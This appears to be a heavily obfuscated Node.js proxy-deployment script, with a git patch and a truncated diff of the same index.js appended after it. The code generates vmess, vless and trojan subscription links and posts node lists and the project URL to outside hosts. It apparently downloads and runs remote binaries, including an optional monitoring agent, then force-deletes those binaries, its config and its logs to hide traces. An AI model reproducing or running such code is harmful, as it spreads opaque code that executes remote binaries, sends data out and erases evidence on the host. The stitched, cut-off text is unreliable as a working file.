_0x59f992={};_0x59f992['v']='2',_0x59f992['ps']=''+_0x1fed17,_0x59f992[_0x2d4c1b(0x30,-0x10e,0x70,-0x10)]=CFIP,_0x59f992['port']=CFPORT,_0x59f992['id']=UUID,_0x59f992['aid']='0',_0x59f992[_0x2d4c1b(-0x8b,0x79,-0x199,0x23)]=_0x59e0c0[_0x25f992(-0x23,0x22,0x126,0xce)],_0x59f992['net']='ws',_0x59f992[_0x2d4c1b(-0x239,-0x307,-0x2e1,-0x1f8)]=_0x59e0c0[_0x25f992(0x155,0x22,0x26,0x158)],_0x59f992[_0x2d4c1b(-0x73,-0x19,-0x27,-0x4d)]=_0x5a2178,_0x59f992[_0x25f992(0x1d2,0x105,0x186,0xdb)]=_0x25f992(0xc1,0x48,0x128,-0xaf)+_0x25f992(0x170,0x1a8,0x1dc,0x2f6),_0x59f992[_0x25f992(0x200,0x18c,0x80,0x10c)]='tls',_0x59f992[_0x25f992(0x2f4,0x197,0x14f,0x29)]=_0x5a2178,_0x59f992['alpn']='',_0x59f992['fp']=_0x59e0c0['HjKwF'];const _0x152cda=_0x59f992,_0x4c6801=_0x2d4c1b(-0xa,0x32,-0xe2,-0x159)+UUID+'@'+CFIP+':'+CFPORT+(_0x25f992(-0x11,0x15a,0x1ef,0x299)+'n=none&sec'+_0x2d4c1b(-0xfd,0x39,-0x166,-0x1ee)+_0x2d4c1b(-0x17e,-0x200,-0x1b,-0x56))+_0x5a2178+('&fp=firefo'+_0x25f992(0x2e0,0x21c,0x161,0x21b)+'host=')+_0x5a2178+(_0x25f992(0x19c,0xc3,0xd9,0xfc)+_0x25f992(0x2a8,0x248,0x11f,0x241)+_0x2d4c1b(-0x1c2,-0x2d4,-0x16e,-0x245)+'0#')+_0x1fed17+(_0x2d4c1b(-0x48,0x9a,0x53,-0xb3)+'//')+Buffer[_0x2d4c1b(-0x264,-0x255,-0x206,-0x10e)](JSON[_0x25f992(0x371,0x258,0x29e,0x161)](_0x152cda))[_0x25f992(-0x90,0x6f,0x7e,0x1cd)](_0x2d4c1b(0x6e,-0xd,0xc8,0x1c2))+('\x0a\x20\x20\x0atrojan'+_0x25f992(0xd6,0x227,0x17a,0x1d9))+UUID+'@'+CFIP+':'+CFPORT+(_0x2d4c1b(-0x13e,0xe,-0x227,-0x4d)+_0x2d4c1b(-0xd2,-0x11d,-0x11f,-0xa9))+_0x5a2178+('&fp=firefo'+'x&type=ws&'+'host=')+_0x5a2178+(_0x2d4c1b(0x40,0x10c,-0x36,-0xdd)+_0x2d4c1b(-0x216,-0x30f,-0x319,-0x1c2)+'%3Fed%3D25'+_0x2d4c1b(-0x50,0xc3,0x87,0xf9))+_0x1fed17+_0x25f992(-0xd1,0x7,0x4c,-0x3d);console[_0x25f992(0x113,0xe,-0x37,-0xfc)](Buffer[_0x2d4c1b(-0x264,-0x11d,-0x324,-0x2e7)](_0x4c6801)[_0x2d4c1b(-0x180,-0x28,-0x1c,-0x284)]('base64')),fs[_0x25f992(0x21a,0xe7,0x1f2,0x20b)+_0x2d4c1b(-0x1d6,-0x1ca,-0xc4,-0x24d)](subPath,Buffer[_0x2d4c1b(-0x264,-0x254,-0x2fa,-0x1a6)](_0x4c6801)[_0x2d4c1b(-0x180,-0x12e,-0x29d,-0x1f3)](_0x25f992(0x277,0x25d,0x2d4,0x359))),console['log'](FILE_PATH+(_0x25f992(-0x10c,0x14,0x15d,0x14e)+_0x2d4c1b(-0x194,-0x252,-0x16a,-0x2f0)+_0x25f992(0xe5,0x212,0x13e,0x2b6))),_0x59e0c0['OMHZG'](uploadNodes),app[_0x25f992(-0x60,-0x50,0x72,0x35)]('/'+SUB_PATH,(_0x467dba,_0x5420bb)=>{function _0x53c7f2(_0x118706,_0xd76d,_0x7f0045,_0x55ed5a){return _0x25f992(_0x118706-0x1e2,_0x7f0045-0x237,_0x7f0045-0xaa,_0x55ed5a);}function _0x3dd983(_0x47969e,_0xc33e23,_0x3468fa,_0x4fe543){return _0x2d4c1b(_0xc33e23-0x4be,_0x47969e,_0x3468fa-0x1f,_0x4fe543-0x136);}if(_0x35dc12[_0x3dd983(0xef,0x25e,0x2c6,0x205)](_0x35dc12[_0x53c7f2(0x2a3,0x295,0x371,0x455)],_0x53c7f2(0x4af,0x329,0x498,0x4ac)))return null;else{const _0x1af210=Buffer[_0x3dd983(0x3b5,0x25a,0x227,0x283)](_0x4c6801)[_0x3dd983(0x313,0x33e,0x1da,0x406)](_0x35dc12[_0x53c7f2(0x3c7,0x1e3,0x2b0,0x258)]);_0x5420bb[_0x53c7f2(0x3f3,0x541,0x482,0x3f5)](_0x35dc12['fqjvW'],_0x35dc12[_0x3dd983(0x5b2,0x525,0x552,0x66f)]),_0x5420bb['send'](_0x1af210);}}),_0x176535(_0x4c6801);}else _0x441e4f['error'](_0x25f992(-0xf9,0x31,-0x6c,-0x128)+'g\x20error:\x20'+_0x157d0b);},0x37*-0xa6+0x148b+0x16ef);});}}}async function uploadNodes(){function _0x33eb5(_0x1237c6,_0x22d7e5,_0x357801,_0x5b01ac){return _0x388b12(_0x22d7e5,_0x22d7e5-0x19c,_0x357801-0x4e,_0x5b01ac-0x20c);}function _0x401441(_0x33a012,_0x2df26f,_0xba465f,_0x56868b){return _0x388b12(_0x2df26f,_0x2df26f-0x128,_0xba465f-0x1b1,_0xba465f- -0x1ad);}const _0x4688c7={};_0x4688c7['bUWVf']=_0x33eb5(0x250,0x3c3,0x3d3,0x308),_0x4688c7[_0x33eb5(0x1e8,0x2b2,0x2b6,0x31c)]=function(_0x2c33e6,_0x34ae5e){return _0x2c33e6&&_0x34ae5e;},_0x4688c7[_0x401441(-0xc4,0x72,0x55,0x3c)]=function(_0x5a26f6,_0x452908){return _0x5a26f6===_0x452908;},_0x4688c7[_0x401441(0x2df,0x2ca,0x18d,0x20b)]=_0x401441(-0xdd,-0x66,-0xa5,-0x1f6),_0x4688c7[_0x33eb5(0x26e,0x4c1,0x412,0x3b3)]=_0x401441(0x2d9,0x2a9,0x20e,0x274),_0x4688c7[_0x33eb5(0x4b8,0x29b,0x413,0x3d0)]=_0x401441(0xc8,0x63,-0x8d,-0x3b),_0x4688c7[_0x401441(0x38,-0x129,-0xb8,-0x122)]=_0x33eb5(0x4c7,0x494,0x54b,0x3f8)+'n/json',_0x4688c7[_0x401441(0x83,0x1a3,0xbd,-0x9f)]=_0x401441(-0xe9,-0x95,0x7,-0x13e)+_0x401441(0xcb,-0xbe,0xaa,0x131)+'d\x20successf'+'ully',_0x4688c7[_0x401441(-0x90,-0x1d9,-0x6a,-0x101)]=_0x33eb5(0x58f,0x612,0x461,0x576),_0x4688c7[_0x401441(0x8e,-0xd,0xf,-0xd5)]=_0x401441(-0x92,0x93,0x58,-0x91),_0x4688c7['YKaCk']=_0x401441(0x265,0x22a,0x187,0x111),_0x4688c7[_0x401441(0xc3,0x149,-0x5,0x64)]=function(_0x22b1fe,_0x3a62ca){return _0x22b1fe===_0x3a62ca;},_0x4688c7['eAOwY']=_0x33eb5(0x569,0x460,0x4ad,0x59c)+_0x401441(0x12a,-0x70,0xdd,-0x39)+_0x401441(0x1fb,0x105,0x1cd,0xc0);const _0xcae4fc=_0x4688c7;if(_0xcae4fc[_0x33eb5(0x1bc,0x265,0x1ec,0x31c)](UPLOAD_URL,PROJECT_URL)){if(_0xcae4fc['zVIVL'](_0x401441(-0x1d6,-0x181,-0xa5,-0x34),_0xcae4fc[_0x401441(0x2ea,0x19c,0x18d,0x287)])){const _0xe0ff84=PROJECT_URL+'/'+SUB_PATH,_0x53c3d2={};_0x53c3d2[_0x401441(-0x142,-0xd8,-0x1b,-0x89)+'on']=[_0xe0ff84];const _0x392e98=_0x53c3d2;try{if(_0xcae4fc[_0x33eb5(0x363,0x3f9,0x481,0x40e)](_0xcae4fc[_0x33eb5(0x51b,0x2c5,0x287,0x3b3)],_0xcae4fc[_0x401441(0x8f,0xf9,0x17,-0x145)]))_0x351f1d[_0x33eb5(0x233,0x3a6,0x43d,0x348)](),_0x3aa170[_0x401441(-0xcf,-0x54,-0x37,-0xe5)](_0x401441(0xed,0x2,0x44,0xd1)+_0x33eb5(0x4e4,0x5ae,0x653,0x54d)),_0x3ddeb9[_0x401441(0x35,-0x96,-0x37,0x8d)](_0x401441(0xe8,0x1b4,0x1cc,0x174)+_0x33eb5(0x6f3,0x65a,0x6e8,0x5a6)+'this\x20scrip'+_0x33eb5(0x40a,0x3d6,0x581,0x431));else{const _0x456ee8={};_0x456ee8[_0x401441(0xac,0x183,0x195,0x46)+'pe']=_0xcae4fc[_0x401441(0x9c,0x2b,-0xb8,-0x1ff)];const _0x226a47={};_0x226a47[_0x401441(0x185,0xc5,0x210,0x146)]=_0x456ee8;const _0x4e7185=await axios[_0x33eb5(0x5bb,0x468,0x4f0,0x521)](UPLOAD_URL+('/api/add-s'+_0x401441(0x10f,-0xd8,-0x2a,0x12f)+'ns'),_0x392e98,_0x226a47);if(_0x4e7185&&_0xcae4fc[_0x401441(0xb9,-0xa9,0x55,0x2)](_0x4e7185[_0x401441(0x2d,-0x88,0xbc,-0x41)],0x1*-0x2423+-0x2*-0x912+0x12c7))return console[_0x33eb5(0x2b3,0x335,0x3e0,0x382)](_0xcae4fc[_0x401441(-0x1e,-0xb0,0xbd,0x1e9)]),_0x4e7185;else{if(_0xcae4fc[_0x33eb5(0x3e4,0x2d3,0x346,0x34f)]!=='OEWzc')_0x1e1cbb(_0x3e0036);else return null;}}}catch(_0x4ec16e){if(_0x4ec16e[_0x33eb5(0x50f,0x488,0x392,0x3ee)]){if(_0xcae4fc[_0x33eb5(0x536,0x359,0x55e,0x40e)](_0x4ec16e['response'][_0x33eb5(0x39c,0x46a,0x50e,0x475)],-0x242a*0x1+0x1224+-0x6d*-0x2e)){}}}}else return _0xcae4fc[_0x33eb5(0x68b,0x6e2,0x51b,0x5ae)];}else{if(UPLOAD_URL){if(!fs[_0x33eb5(0x3bc,0x540,0x5de,0x528)](listPath))return;const _0xc41096=fs[_0x33eb5(0x54c,0x414,0x3e5,0x48a)+'nc'](listPath,_0xcae4fc[_0x33eb5(0x3d2,0x3ae,0x48b,0x3c8)]),_0x43af2c=_0xc41096[_0x401441(0x125,0x1de,0xb4,0x20d)]('\x0a')[_0x33eb5(0x4d8,0x62a,0x56a,0x4c7)](_0x17c87d=>/(vless|vmess|trojan|hysteria2|tuic):\/\//[_0x33eb5(0x1e9,0x3c2,0x3e1,0x357)](_0x17c87d));if(_0x43af2c[_0x33eb5(0x49a,0x649,0x65a,0x56c)]===-0x2353+0x1e1c+0x537)return;const _0x3ce47a={};_0x3ce47a[_0x33eb5(0x399,0x535,0x4e0,0x4f5)]=_0x43af2c;const _0x5aa9b5=JSON[_0x33eb5(0x543,0x627,0x71a,0x5cc)](_0x3ce47a);try{if(_0xcae4fc[_0x401441(0xe7,0x6f,0x55,0xed)](_0xcae4fc[_0x33eb5(0x44d,0x624,0x516,0x534)],_0xcae4fc[_0x33eb5(0x4c3,0x646,0x431,0x534)])){const _0x47aaa3={};_0x47aaa3[_0x401441(0x2ce,0x29a,0x195,0x281)+'pe']=_0xcae4fc[_0x33eb5(0x1f4,0x357,0x203,0x301)];const _0xb45487={};_0xb45487[_0x401441(0x269,0x307,0x210,0x1f3)]=_0x47aaa3;const _0x4dc068=await axios[_0x401441(0x25d,0x290,0x168,0x2ca)](UPLOAD_URL+(_0x401441(0x1ec,0x105,0x186,0x4b)+_0x33eb5(0x3d3,0x446,0x34a,0x313)),_0x5aa9b5,_0xb45487);return _0x4dc068&&_0xcae4fc[_0x33eb5(0x505,0x29c,0x4e6,0x3b4)](_0x4dc068['status'],-0x25db+-0x723+-0x9*-0x516)?(console[_0x33eb5(0x2a5,0x243,0x2d3,0x382)](_0xcae4fc['eAOwY']),_0x4dc068):null;}else _0x380f71[_0x33eb5(0x5e6,0x463,0x5b9,0x588)](_0x37ff71);}catch(_0x4fa4f4){return null;}}else return;}}function cleanFiles(){const _0xc2a350={'yuTyX':'App\x20is\x20run'+_0x16afa8(0x658,0x5d1,0x65c,0x5c4),'BdQcG':'Thank\x20you\x20'+_0x16afa8(0x6d3,0x6c1,0x6b5,0x670)+_0x2dbb7e(0x835,0x750,0x7c6,0x73f)+_0x16afa8(0x5d5,0x4fc,0x540,0x55b),'tmMOh':_0x2dbb7e(0x56d,0x724,0x50a,0x5ed),'nUoBZ':function(_0x122975,_0xf4c1e2){return _0x122975(_0xf4c1e2);},'PxFGX':function(_0x220262,_0x12b559){return _0x220262+_0x12b559;},'gxaBC':_0x2dbb7e(0x62c,0x6a4,0x79b,0x731)+_0x2dbb7e(0x54b,0x5f8,0x5b6,0x5b6),'yQhWL':'{}.constru'+_0x2dbb7e(0x8cb,0x75d,0x890,0x7ae)+'rn\x20this\x22)('+'\x20)','oXyEi':function(_0x5646a7,_0x5742ef){return _0x5646a7!==_0x5742ef;},'WNxGH':_0x2dbb7e(0x66f,0x509,0x723,0x5eb),'bLZcN':_0x16afa8(0x6b8,0x617,0x61d,0x50d),'hrZNp':function(_0x4f1990,_0x33ca2c){return _0x4f1990===_0x33ca2c;},'hVwMW':function(_0x1f4a42,_0x4d949e){return _0x1f4a42&&_0x4d949e;},'ZVLNE':_0x16afa8(0x586,0x556,0x43d,0x486),'dMGdO':function(_0x43965a,_0x57dfb1,_0x185288){return _0x43965a(_0x57dfb1,_0x185288);}};function _0x16afa8(_0x2d91ba,_0x691ce2,_0x1117aa,_0x3ed3d8){return _0x388b12(_0x691ce2,_0x691ce2-0x8b,_0x1117aa-0xcf,_0x1117aa-0x31b);}function _0x2dbb7e(_0x57ea4a,_0x57304c,_0x42f45e,_0x2419e0){return _0x388b12(_0x42f45e,_0x57304c-0x78,_0x42f45e-0x113,_0x2419e0-0x411);}setTimeout(()=>{const _0x11cfa1={'qrECF':function(_0x526fe3,_0x18f9ea){function _0x4fa610(_0x58df0c,_0x5e3876,_0x32c232,_0x178135){return _0x4971(_0x5e3876- -0x154,_0x178135);}return _0xc2a350[_0x4fa610(0x240,0x247,0x38d,0x121)](_0x526fe3,_0x18f9ea);},'JUCSN':function(_0x8a15e1,_0x2a9a8f){return _0xc2a350['PxFGX'](_0x8a15e1,_0x2a9a8f);},'HvKZD':_0xc2a350[_0x4fb80a(0x53e,0x662,0x6c9,0x6e0)],'SKcaB':_0xc2a350['yQhWL'],'MkvcF':function(_0x4c0388,_0x3cd3d6){function _0x3f1376(_0x26423a,_0xd2c353,_0x451b55,_0x335910){return _0x4fb80a(_0x26423a-0x6f,_0x335910- -0x4f2,_0x451b55-0x1b6,_0x451b55);}return _0xc2a350[_0x3f1376(0x187,0x27e,0xac,0x1da)](_0x4c0388,_0x3cd3d6);},'grBNg':_0xc2a350['WNxGH'],'AmvJA':_0xc2a350[_0x83e643(0xa8,-0xa2,-0xc5,0x69)],'MjxYv':_0xc2a350[_0x4fb80a(0x697,0x5d3,0x51e,0x73b)]};function _0x4fb80a(_0x503716,_0x126745,_0xa5f007,_0x384ef3){return _0x2dbb7e(_0x503716-0x101,_0x126745-0xf7,_0x384ef3,_0x126745- -0x91);}function _0x83e643(_0x5b344c,_0x1539f4,_0x11a807,_0x58575b){return _0x2dbb7e(_0x5b344c-0x1,_0x1539f4-0x141,_0x11a807,_0x5b344c- -0x598);}if(_0xc2a350[_0x83e643(0x1c5,0x179,0x14f,0x116)](_0xc2a350['bLZcN'],_0xc2a350[_0x83e643(0x12e,0x25b,0x19c,0xe9)]))_0x5eadb9[_0x4fb80a(0x4c1,0x538,0x4d4,0x57d)](_0x23b57e,_0x3a806e,_0x8b3058=>{function _0x358403(_0x11ca7b,_0x55432c,_0x42fea3,_0x234bed){return _0x4fb80a(_0x11ca7b-0x4,_0x234bed- -0x6eb,_0x42fea3-0x3c,_0x11ca7b);}function _0x46fae4(_0x1112d7,_0x5d49dc,_0x516b23,_0x35ec32){return _0x83e643(_0x516b23-0x11,_0x5d49dc-0x19f,_0x1112d7,_0x35ec32-0x37);}_0x8b3058?_0x5c9ae1['error']('Empowermen'+_0x46fae4(0x173,-0x14,0x137,-0x17)+'or\x20'+_0x189760+':\x20'+_0x8b3058):_0x57aba7[_0x46fae4(0xf4,0x14b,0x0,-0x12c)](_0x46fae4(0xf,0x1f,-0x48,0xb4)+_0x46fae4(0x18c,0x282,0x243,0x113)+_0x46fae4(-0x45,0x147,0x11c,0x1c4)+_0x49bc23+':\x20'+_0x2233ab['toString'](-0x1295*0x2+-0x1218+-0x15*-0x2a2));});else{const _0xbeb184=[bootLogPath,configPath,webPath,botPath];if(NEZHA_PORT)_0xc2a350[_0x4fb80a(0x6fc,0x5ae,0x575,0x6d2)](_0x83e643(0x80,0x6e,-0xc8,0x62),_0x83e643(0x80,-0x84,0x37,0x1c0))?_0xbeb184['push'](npmPath):(_0x224ed6[_0x83e643(-0x4b,-0xb4,-0xa9,0x96)](),_0x512833[_0x4fb80a(0x58f,0x4f6,0x573,0x3cd)](_0xc2a350[_0x83e643(0xa8,-0xbd,-0x4f,0xfe)]),_0x4a973e[_0x83e643(-0x11,-0x80,-0x11a,0xf9)](_0xc2a350['BdQcG']));else _0xc2a350[_0x83e643(0xfa,0x1f7,0x188,0x159)](NEZHA_SERVER,NEZHA_KEY)&&_0xbeb184[_0x4fb80a(0x5f7,0x6fc,0x67a,0x816)](phpPath);_0xc2a350['hrZNp'](process[_0x4fb80a(0x5ae,0x4d5,0x5c6,0x4fe)],_0xc2a350[_0x83e643(0x56,0x6,0x61,0x5f)])?_0xc2a350[_0x83e643(-0x8a,-0x1ca,-0x183,-0x171)](exec,'del\x20/f\x20/q\x20'+_0xbeb184[_0x4fb80a(0x55b,0x6a3,0x548,0x801)]('\x20')+('\x20>\x20nul\x202>&'+'1'),_0x2f784f=>{function _0xeff02a(_0x5e7d30,_0x404b11,_0x4aaf22,_0x326c28){return _0x83e643(_0x5e7d30-0x1a2,_0x404b11-0x3e,_0x326c28,_0x326c28-0x1a6);}function _0x413a42(_0x271ace,_0x3d873e,_0x2ac448,_0x6e06d4){return _0x4fb80a(_0x271ace-0xe2,_0x6e06d4- -0x111,_0x2ac448-0x182,_0x271ace);}if(_0x11cfa1[_0xeff02a(0x2c5,0x308,0x262,0x161)](_0x11cfa1[_0xeff02a(0x1e0,0x1d3,0xd6,0x22c)],_0x11cfa1[_0xeff02a(0x1e0,0x2bb,0x2b1,0x2c5)])){const _0x27e20d=KvJjGZ[_0x413a42(0x47b,0x49e,0x478,0x581)](_0x4424a6,KvJjGZ[_0xeff02a(0x243,0x384,0x286,0x167)](KvJjGZ[_0x413a42(0x4a1,0x424,0x374,0x497)](KvJjGZ[_0xeff02a(0x2f1,0x345,0x31b,0x2be)],KvJjGZ[_0xeff02a(0x378,0x25d,0x378,0x2a3)]),');'));_0x224acf=_0x27e20d();}else console[_0x413a42(0x2dd,0x37d,0x484,0x3ab)](),console[_0x413a42(0x331,0x2f0,0x441,0x3e5)](_0x11cfa1[_0x413a42(0x40c,0x2ee,0x3be,0x3fd)]),console[_0xeff02a(0x191,0x2d3,0x52,0x12a)](_0x11cfa1['MjxYv']);}):_0xc2a350[_0x83e643(-0x8a,-0x13e,-0x1f0,-0x1c1)](exec,_0x83e643(0x15a,0x15b,0x57,0x29d)+_0xbeb184[_0x83e643(0x19c,0x2c6,0x15c,0x137)]('\x20')+(_0x4fb80a(0x46c,0x478,0x338,0x56f)+_0x4fb80a(0x737,0x743,0x85d,0x60f)),_0x33f154=>{function _0x47d6da(_0x4b6cf9,_0x572d02,_0x10b027,_0x4d870d){return _0x83e643(_0x4d870d- -0x204,_0x572d02-0xfe,_0x10b027,_0x4d870d-0x2f);}function _0x2f87af(_0x619935,_0x4dcb4e,_0x1d683b,_0x5328bc){return _0x4fb80a(_0x619935-0xc1,_0x4dcb4e- -0x1a,_0x1d683b-0x184,_0x5328bc);}if(_0xc2a350[_0x47d6da(-0x184,-0x21a,-0xda,-0x180)]!=='MmMrt')return;else console[_0x2f87af(0x3c9,0x4a2,0x4b6,0x4fd)](),console['log'](_0x2f87af(0x5a2,0x557,0x604,0x3f2)+'ning'),console[_0x2f87af(0x4eb,0x4dc,0x612,0x52f)]('Thank\x20you\x20'+'for\x20using\x20'+_0x47d6da(-0x82,0x4c,-0x10a,-0x5d)+_0x2f87af(0x5f4,0x58b,0x48b,0x61c));});}},-0x1a723*0x1+0x7445+-0x32a6*-0xd);}cleanFiles();async function AddVisitTask(){const _0x41e009={};_0x41e009['yAWuu']=_0x541632(0x59b,0x487,0x4cf,0x443)+_0x541632(0x665,0x52a,0x47e,0x5a1)+_0x541632(0x6d4,0x654,0x5ee,0x50a)+'ully',_0x41e009[_0x541632(0x605,0x64e,0x611,0x7aa)]=function(_0x4c63fe,_0x5aefc1){return _0x4c63fe||_0x5aefc1;},_0x41e009['dxoIg']=_0x541632(0x614,0x5fa,0x766,0x678)+_0x541632(0x4b9,0x5b0,0x446,0x498)+_0x541632(0x36d,0x427,0x47d,0x2bd)+_0x55709e(0x284,0x3a0,0x437,0x33d),_0x41e009[_0x541632(0x54a,0x51d,0x411,0x46e)]=function(_0x5f4fd0,_0xceae7e){return _0x5f4fd0!==_0xceae7e;},_0x41e009['LPNfa']=_0x541632(0x520,0x5fd,0x558,0x72b);function _0x55709e(_0x2bef9f,_0x3c552f,_0x519668,_0x37585b){return _0x388b12(_0x2bef9f,_0x3c552f-0x40,_0x519668-0x186,_0x37585b-0x233);}_0x41e009[_0x541632(0x655,0x523,0x43f,0x55a)]='applicatio'+_0x541632(0x56e,0x459,0x410,0x399);const _0x2a418e=_0x41e009;function _0x541632(_0x5e58d4,_0x2592f0,_0x47a90c,_0x23beb9){return _0x4d5570(_0x5e58d4-0xc6,_0x2592f0-0x81,_0x47a90c-0x95,_0x5e58d4);}if(_0x2a418e[_0x55709e(0x59b,0x5f1,0x59d,0x5ae)](!AUTO_ACCESS,!PROJECT_URL)){console[_0x541632(0x535,0x449,0x549,0x5b2)](_0x2a418e[_0x541632(0x56b,0x577,0x624,0x4ff)]);return;}try{if(_0x2a418e['TZNSk'](_0x541632(0x6ab,0x5fd,0x67f,0x76d),_0x2a418e['LPNfa']))return _0x31a167['log'](_0x2a418e[_0x55709e(0x46b,0x34f,0x4ec,0x4aa)]),_0x1c5e3a;else{const _0x42fc0c={};_0x42fc0c[_0x541632(0x4ae,0x4d0,0x62d,0x4c2)]=PROJECT_URL;const _0x195d73={};_0x195d73[_0x541632(0x5ae,0x615,0x746,0x5ba)+'pe']=_0x2a418e[_0x541632(0x459,0x523,0x524,0x593)];const _0x3d0a29={};_0x3d0a29['headers']=_0x195d73;const _0xce006e=await axios['post']('https://oo'+_0x541632(0x40e,0x4e8,0x3cb,0x61a)+_0x541632(0x547,0x629,0x6a4,0x73e)+'l',_0x42fc0c,_0x3d0a29);return console[_0x55709e(0x4ba,0x44b,0x302,0x3a9)]('automatic\x20'+_0x55709e(0x419,0x4ee,0x5c0,0x45d)+'k\x20added\x20su'+_0x55709e(0x43b,0x3c8,0x45f,0x447)),_0xce006e;}}catch(_0x589302){return console[_0x55709e(0x354,0x391,0x58e,0x488)](_0x55709e(0x51b,0x6c3,0x675,0x5ed)+'tic\x20access'+_0x541632(0x4f1,0x422,0x4a7,0x50a)+'d:\x20'+_0x589302[_0x541632(0x4e9,0x64a,0x5f3,0x60f)]),null;}}async function startserver(){function _0x1774ab(_0x2e21f8,_0x535001,_0x32b80e,_0xa796fd){return _0x4d5570(_0x2e21f8-0x9d,_0x535001- -0x26c,_0x32b80e-0xbe,_0x32b80e);}const _0x57a557={'iFfpe':'0|5|3|2|1|'+'4','TeZvz':function(_0x2b38ae){return _0x2b38ae();},'hemou':function(_0x47ab9b){return _0x47ab9b();},'LPVUR':function(_0x33070e){return _0x33070e();},'Umkow':function(_0x26b8b5){return _0x26b8b5();},'tRXmF':'Error\x20in\x20s'+_0x1774ab(0x91,0xff,0x22c,-0xa)+':'};function _0x4733ab(_0x1cd4c5,_0xc42bee,_0x34eb9a,_0x1807c3){return _0x4d5570(_0x1cd4c5-0x1c0,_0x1807c3- -0xd6,_0x34eb9a-0x66,_0x1cd4c5);}try{const _0x58bc96=_0x57a557[_0x4733ab(0x4b6,0x331,0x598,0x43a)][_0x1774ab(0x1c4,0x247,0x19d,0x216)]('|');let _0x1a2bcd=-0xb20+0xcff+-0x1df*0x1;while(!![]){switch(_0x58bc96[_0x1a2bcd++]){case'0':_0x57a557[_0x4733ab(0x40a,0x449,0x524,0x4c3)](deleteNodes);continue;case'1':await extractDomains();continue;case'2':await _0x57a557['hemou'](downloadFilesAndRun);continue;case'3':await _0x57a557[_0x1774ab(0x335,0x3a5,0x483,0x316)](generateConfig);continue;case'4':await AddVisitTask();continue;case'5':_0x57a557['Umkow'](cleanupOldFiles);continue;}break;}}catch(_0x1ef978){console[_0x4733ab(0x3b5,0x314,0x2df,0x3d1)](_0x57a557[_0x1774ab(0x465,0x2fa,0x273,0x289)],_0x1ef978);}}startserver()['catch'](_0x40ac11=>{const _0x1560ce={};_0x1560ce[_0x545f8e(0x14,0xc8,-0xea,0x7a)]=_0x545f8e(0x1c7,0x257,0x295,0x1f4)+_0x545f8e(0x1a1,0x89,-0xe0,0x89)+'tartserver'+':';function _0x1bb263(_0x66b087,_0xb7ab8c,_0x1569ae,_0x577d61){return _0x388b12(_0x1569ae,_0xb7ab8c-0x90,_0x1569ae-0x16a,_0x577d61- -0x346);}function _0x545f8e(_0x18be80,_0x1f4100,_0x2e5282,_0x16133e){return _0x388b12(_0x2e5282,_0x1f4100-0x199,_0x2e5282-0x1c1,_0x16133e- -0x7c);}const _0x389079=_0x1560ce;console[_0x1bb263(-0xb6,-0xc0,-0x1a2,-0xf1)](_0x389079[_0x1bb263(-0x302,-0x245,-0x157,-0x250)],_0x40ac11);}),app[_0x4d5570(0x370,0x388,0x4b7,0x2da)](PORT,()=>console[_0x4d5570(0x2ad,0x3c8,0x46e,0x499)](_0x4d5570(0x46b,0x4e7,0x525,0x63b)+'r\x20is\x20runni'+_0x388b12(0x22f,0x275,0xff,0x163)+':'+PORT+'!')); From 8165d89c2f8189488a068a5acd1a0e259aa9bd11 Mon Sep 17 00:00:00 2001 From: hansc86 <49715253+hansc86@users.noreply.github.com> Date: Fri, 24 Apr 2026 20:49:41 +0800 Subject: [PATCH 04/19] Update index.js --- index.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/index.js b/index.js index 6f1dfe71d7..90d2950097 100644 --- a/index.js +++ b/index.js @@ -1 +1 @@ -(function(_0x25b1b4,_0x4f1892){const _0x98bc7a=_0x25b1b4();function _0xae4b24(_0x5a6985,_0x30a9c8,_0x5850c8,_0x148d3f){return _0x4971(_0x148d3f-0x7c,_0x5850c8);}function _0x43dcde(_0x5a540d,_0x34f927,_0x580865,_0x2d3047){return _0x4971(_0x5a540d-0x6,_0x580865);}while(!![]){try{const _0x116ead=-parseInt(_0x43dcde(0x3da,0x2c3,0x31f,0x4f4))/(0x10e2+0xfa+-0x11db)*(-parseInt(_0xae4b24(0x216,0x16f,0x304,0x1f2))/(0x2e7*-0xb+-0x85*-0x42+-0x25b))+-parseInt(_0xae4b24(0x231,0x17f,0x15b,0x277))/(0x166c+0xa27*0x3+0x1*-0x34de)*(parseInt(_0xae4b24(0x1a5,0x1b0,0x109,0x1ff))/(0x71b*0x5+-0x1*0x25aa+0x13*0x1d))+parseInt(_0x43dcde(0x2ab,0x1fd,0x3ae,0x2f1))/(-0x1*-0x1456+0x10c0+-0x2511)+-parseInt(_0xae4b24(0x389,0x302,0x221,0x240))/(0xb5*0x4+-0x1153+0xe85)+-parseInt(_0x43dcde(0x23b,0x23a,0x2a8,0x286))/(0x259*-0x10+-0x1bc*-0xe+0xd4f)*(parseInt(_0x43dcde(0x408,0x2c2,0x464,0x4e2))/(-0x165e+-0x5*0x44c+0x52*0x89))+parseInt(_0x43dcde(0x1ee,0x19e,0x221,0x1da))/(-0xff7*-0x1+-0x23f7+-0x17*-0xdf)*(parseInt(_0x43dcde(0x35a,0x38f,0x24a,0x336))/(0xb58+-0x1823+-0x1*-0xcd5))+parseInt(_0xae4b24(0x2d3,0x3ca,0x2d4,0x268))/(-0x36*-0x2e+0xb0c+-0x14b5);if(_0x116ead===_0x4f1892)break;else _0x98bc7a['push'](_0x98bc7a['shift']());}catch(_0x3f804f){_0x98bc7a['push'](_0x98bc7a['shift']());}}}(_0x2c50,0x17*-0x4ffa+-0x3445*0x25+0x13f097));const _0x16b6db=(function(){const _0x451532={};_0x451532[_0x528275(0x14b,0x178,0x378,0x208)]=function(_0xdd4da6,_0x4daf05){return _0xdd4da6!==_0x4daf05;},_0x451532[_0x528275(0x43f,0x486,0x28f,0x38b)]='PaVdt';function _0x528275(_0xdc019d,_0x47cc8d,_0x126623,_0x332a83){return _0x4971(_0x332a83- -0x11,_0x126623);}_0x451532[_0x1ae50a(0x22,0xe2,0x61,0x4a)]=_0x528275(0x3c7,0x349,0x253,0x32c),_0x451532[_0x528275(0x200,0x1e1,0x464,0x327)]='oIcya',_0x451532[_0x1ae50a(0x1c7,0x151,0x25a,0x20a)]=function(_0x1014c5,_0x52cc04){return _0x1014c5===_0x52cc04;},_0x451532[_0x528275(0x27b,0x1ba,0x423,0x30a)]=_0x528275(0x186,-0x43,0x190,0x125),_0x451532[_0x1ae50a(0x14c,-0x15,0x57,-0xc7)]='Yltvb';const _0x18865f=_0x451532;let _0x5d2708=!![];function _0x1ae50a(_0x86c21,_0xdd2fc9,_0x4e1117,_0x2a7714){return _0x4971(_0xdd2fc9- -0x179,_0x86c21);}return function(_0x43a64f,_0x5498c3){function _0x4481fe(_0x5a0518,_0xcc13b7,_0x11c238,_0x5c3609){return 